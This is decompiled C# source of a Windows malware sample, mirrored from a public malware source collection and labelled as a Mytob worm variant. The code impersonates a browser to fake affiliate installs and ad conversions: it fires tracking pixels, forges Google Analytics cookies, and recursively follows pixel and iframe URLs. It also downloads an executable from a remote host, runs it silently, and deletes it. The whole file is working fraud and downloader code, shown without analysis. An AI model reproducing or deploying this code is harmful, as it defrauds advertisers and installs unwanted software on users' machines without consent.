mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
270 lines
13 KiB
C#
270 lines
13 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: AffiliateExecuterNoWin.Program
|
|||
|
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
|
|||
|
|
|||
|
using HTTPAgent;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Net;
|
|||
|
using System.Reflection;
|
|||
|
using System.Text.RegularExpressions;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace AffiliateExecuterNoWin
|
|||
|
{
|
|||
|
internal static class Program
|
|||
|
{
|
|||
|
private static string trackerUrlAndVersion;
|
|||
|
|
|||
|
[STAThread]
|
|||
|
private static void Main(string[] args)
|
|||
|
{
|
|||
|
string str1 = "http://coolfbskins.info/getitnow";
|
|||
|
string appName = "hazidtacp";
|
|||
|
bool flag1 = false;
|
|||
|
string URL = "http://whatismyipaddress.com/";
|
|||
|
bool flag2 = false;
|
|||
|
string str2 = "gamewrangler_v2.exe";
|
|||
|
string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2;
|
|||
|
Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2";
|
|||
|
if (new DateTime(3000, 1, 1) < DateTime.Now)
|
|||
|
return;
|
|||
|
Agent agent = new Agent();
|
|||
|
agent.EmulateBrowser();
|
|||
|
if (flag1)
|
|||
|
{
|
|||
|
string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0];
|
|||
|
string savedIps = Program.GetSavedIPs(appName);
|
|||
|
if (savedIps.IndexOf(data) >= 0)
|
|||
|
return;
|
|||
|
Program.SetSavedIPs(appName, savedIps + data + ";");
|
|||
|
}
|
|||
|
if (!string.IsNullOrEmpty(str1))
|
|||
|
agent.Referer = str1;
|
|||
|
string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0];
|
|||
|
agent.GetURL(data1);
|
|||
|
string referer = agent.Referer;
|
|||
|
agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F");
|
|||
|
agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/");
|
|||
|
agent.Referer = "";
|
|||
|
agent.GetURL("http://www.facetheme.com/install_redirect.php");
|
|||
|
string upper = Guid.NewGuid().ToString().ToUpper();
|
|||
|
agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0");
|
|||
|
agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/");
|
|||
|
agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft");
|
|||
|
agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560");
|
|||
|
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
|
|||
|
string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID=");
|
|||
|
Program.GetRecursivePixels(agent, url2);
|
|||
|
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
|
|||
|
agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560");
|
|||
|
if (!flag2)
|
|||
|
return;
|
|||
|
if (Directory.Exists("C:\\Users\\Public\\Documents\\"))
|
|||
|
str2 = "C:\\Users\\Public\\Documents\\" + str2;
|
|||
|
agent.getURL2File(url1, str2);
|
|||
|
try
|
|||
|
{
|
|||
|
Process.Start(str2, "/s").WaitForExit();
|
|||
|
System.IO.File.Delete(str2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void GetRecursivePixels(Agent agent, string html)
|
|||
|
{
|
|||
|
html = Regex.Replace(html, "<noscript>.*?</noscript>", "");
|
|||
|
List<string> stringList = new List<string>();
|
|||
|
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1"));
|
|||
|
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<SCRIPT language=\"javascript\" src=\" ?([^\"]+)", "$1"));
|
|||
|
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<IMG src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
|
|||
|
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<img src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
|
|||
|
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<iframe[^>]+?src=[\"']([^\"'\\\\]+)", "$1"));
|
|||
|
string cid = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_id *= *([0-9]+)", "$1"));
|
|||
|
if (cid != "")
|
|||
|
{
|
|||
|
string clang = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_language\\s*=\\s*\"([^\"]+)", "$1"));
|
|||
|
string cformat = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_format\\s*=\\s*\"([^\"]+)", "$1"));
|
|||
|
string ccolor = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_color\\s*=\\s*\"([^\"]+)", "$1"));
|
|||
|
string clabel = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_label\\s*=\\s*\"([^\"]+)", "$1"));
|
|||
|
stringList.Add(Program.createGoogleAdServicesURL(cid, clang, cformat, ccolor, clabel));
|
|||
|
}
|
|||
|
string offerID = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_offer_id\\s*=\\s*'([^']+)", "$1"));
|
|||
|
string referece = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_reference\\s*=\\s*'([^']+)", "$1"));
|
|||
|
if (offerID != "")
|
|||
|
stringList.Add(Program.createFilitracURL(offerID, referece));
|
|||
|
string referer = agent.Referer;
|
|||
|
foreach (string str in stringList)
|
|||
|
{
|
|||
|
agent.Referer = referer;
|
|||
|
string URL = str.Trim().Replace("&", "&");
|
|||
|
string url = agent.GetURL(URL);
|
|||
|
Program.GetRecursivePixels(agent, url);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static string randomString(int len)
|
|||
|
{
|
|||
|
string str1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
|
|||
|
Random random = new Random();
|
|||
|
string str2 = "";
|
|||
|
for (int index = 0; index < len; ++index)
|
|||
|
str2 += (string) (object) str1[random.Next(str1.Length)];
|
|||
|
return str2;
|
|||
|
}
|
|||
|
|
|||
|
private static string GetSavedIPs(string appName)
|
|||
|
{
|
|||
|
string savedIps = ";";
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, false);
|
|||
|
if (registryKey != null)
|
|||
|
savedIps = registryKey.GetValue("ips").ToString();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
return savedIps;
|
|||
|
}
|
|||
|
|
|||
|
private static void SetSavedIPs(string appName, string val)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
(Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, true) ?? Registry.CurrentUser.CreateSubKey("SOFTWARE\\" + appName)).SetValue("ips", (object) val);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void addTrackingCookies(CookieContainer cookies, string domain)
|
|||
|
{
|
|||
|
Random random = new Random();
|
|||
|
Uri uri1 = new Uri("http://" + domain + "/");
|
|||
|
Uri uri2 = new Uri("http://utm.trk." + domain + "/");
|
|||
|
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
|
|||
|
string str1 = Program.uHash(domain);
|
|||
|
string str2 = str1 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1";
|
|||
|
string str3 = str1 + "." + (object) totalSeconds + ".1.1.utmcsr=ZJxdm025|utmccn=(not+set)|utmcmd=(not+set)";
|
|||
|
cookies.Add(uri1, Program.createCookie("__utma", str2, 1800));
|
|||
|
cookies.Add(uri1, Program.createCookie("__utmb", str1, 1800));
|
|||
|
cookies.Add(uri1, Program.createCookie("__utmc", str1, 1800));
|
|||
|
cookies.Add(uri1, Program.createCookie("__utmz", str3, 1800));
|
|||
|
cookies.Add(uri2, Program.createCookie("__utma", str2, 1800));
|
|||
|
cookies.Add(uri2, Program.createCookie("__utmb", str1, 1800));
|
|||
|
cookies.Add(uri2, Program.createCookie("__utmc", str1, 1800));
|
|||
|
cookies.Add(uri2, Program.createCookie("__utmz", str3, 1800));
|
|||
|
}
|
|||
|
|
|||
|
private static void BugFix_CookieDomain(CookieContainer cookieContainer, string domain)
|
|||
|
{
|
|||
|
Hashtable hashtable = (Hashtable) typeof (CookieContainer).InvokeMember("m_domainTable", BindingFlags.Instance | BindingFlags.NonPublic | BindingFlags.GetField, (Binder) null, (object) cookieContainer, new object[0]);
|
|||
|
foreach (string key1 in new ArrayList(hashtable.Keys))
|
|||
|
{
|
|||
|
string str = key1;
|
|||
|
if (str == domain)
|
|||
|
{
|
|||
|
string key2 = "." + str;
|
|||
|
hashtable[(object) key2] = hashtable[(object) key1];
|
|||
|
hashtable.Remove((object) key1);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static string uHash(string d)
|
|||
|
{
|
|||
|
int num1 = 0;
|
|||
|
for (int startIndex = d.Length - 1; startIndex >= 0; --startIndex)
|
|||
|
{
|
|||
|
int num2 = (int) char.Parse(d.Substring(startIndex, 1));
|
|||
|
num1 = (num1 << 6 & 268435455) + num2 + (num2 << 14);
|
|||
|
int num3;
|
|||
|
if ((num3 = num1 & 266338304) != 0)
|
|||
|
num1 ^= num3 >> 21;
|
|||
|
}
|
|||
|
return num1.ToString();
|
|||
|
}
|
|||
|
|
|||
|
public static Cookie createCookie(string name, string value, int timeout) => new Cookie(name, value)
|
|||
|
{
|
|||
|
Expires = DateTime.Now.AddSeconds((double) timeout)
|
|||
|
};
|
|||
|
|
|||
|
public static string GetTrackingUrlByTemplate(
|
|||
|
Agent agent,
|
|||
|
string url,
|
|||
|
string trackingSearch,
|
|||
|
string trackingReplace,
|
|||
|
string domain)
|
|||
|
{
|
|||
|
string title = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmdt=([^&]*)", "$1"));
|
|||
|
string hostname = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmhn=([^&]*)", "$1"));
|
|||
|
string referer = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmr=([^&]*)", "$1"));
|
|||
|
string tracking = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmp=([^&]*)", "$1"));
|
|||
|
string utmac = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmac=([^&]*)", "$1"));
|
|||
|
bool addutmcn = !(Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "(&utmcn=1)", "$1")) == "");
|
|||
|
string URL = Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, utmac, domain);
|
|||
|
if (!string.IsNullOrEmpty(trackingSearch) || !string.IsNullOrEmpty(trackingReplace))
|
|||
|
URL = URL.Replace(trackingSearch, trackingReplace);
|
|||
|
return agent.GetURL(URL);
|
|||
|
}
|
|||
|
|
|||
|
public static string FirstOrEmpty(string[] arr) => arr.Length > 0 ? arr[0] : "";
|
|||
|
|
|||
|
public static string sGetTrackingUrl(
|
|||
|
Agent agent,
|
|||
|
string title,
|
|||
|
string hostname,
|
|||
|
string referer,
|
|||
|
string tracking,
|
|||
|
bool addutmcn)
|
|||
|
{
|
|||
|
return agent.GetURL(Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, "", ""));
|
|||
|
}
|
|||
|
|
|||
|
public static string createTrackingUrl(
|
|||
|
string title,
|
|||
|
string hostname,
|
|||
|
string referer,
|
|||
|
string tracking,
|
|||
|
bool addutmcn,
|
|||
|
string utmac,
|
|||
|
string domain)
|
|||
|
{
|
|||
|
Random random = new Random();
|
|||
|
string str1 = Screen.PrimaryScreen.Bounds.Width.ToString() + "x" + (object) Screen.PrimaryScreen.Bounds.Height;
|
|||
|
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
|
|||
|
string str2 = Program.uHash(domain);
|
|||
|
string str3 = "__utma%3D" + (str2 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1") + "%3B%2B__utmz%3D" + (str2 + "." + (object) totalSeconds + ".1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B");
|
|||
|
return Program.trackerUrlAndVersion + "&utms=1&utmn=" + (object) random.Next(int.MaxValue) + "&utmhn=" + hostname + "&utmcs=utf-8&utmsr=" + str1 + "&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.2%20r159" + (title == "" ? (object) "" : (object) ("&utmdt=" + title)) + "&utmhid=" + (object) random.Next(int.MaxValue) + (referer == "" ? (object) "" : (object) ("&utmr=" + referer)) + (addutmcn ? (object) "&utmcn=1" : (object) "") + "&utmp=" + tracking + "&utmac=" + utmac + "&utmcc=" + str3 + "&utmu=q~";
|
|||
|
}
|
|||
|
|
|||
|
private static string createFilitracURL(string offerID, string referece) => "http://www.filitrac.com/Lead.aspx?pid=" + offerID + "&ref=" + referece + "&iframe=1";
|
|||
|
|
|||
|
private static string createGoogleAdServicesURL(
|
|||
|
string cid,
|
|||
|
string clang,
|
|||
|
string cformat,
|
|||
|
string ccolor,
|
|||
|
string clabel)
|
|||
|
{
|
|||
|
long num = 1000L * (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds + (long) new Random().Next(1000);
|
|||
|
string[] strArray = clang.Split('_');
|
|||
|
string str1 = strArray[0];
|
|||
|
string str2 = strArray.Length <= 1 ? "" : strArray[1];
|
|||
|
TimeSpan timeSpan = DateTime.Now - DateTime.UtcNow;
|
|||
|
return "http://www.googleadservices.com/pagead/conversion/" + cid + "/?random=" + (object) num + "&cv=6&fst=" + (object) num + "&num=1&fmt=" + cformat + "&label=" + clabel + "&bg=" + ccolor + "&hl=" + str1 + "&gl=" + str2 + "&guid=ON&u_h=" + (object) Screen.PrimaryScreen.Bounds.Height + "&u_w=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_ah=" + (object) (Screen.PrimaryScreen.Bounds.Height - 30) + "&u_aw=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_cd=32&u_his=2&u_tz=" + (object) (int) (DateTime.Now - DateTime.UtcNow).TotalMinutes + "&u_nplug=0&u_nmime=0&url=http%3A//www.zwinky.com/dl/successPixels.jhtml";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|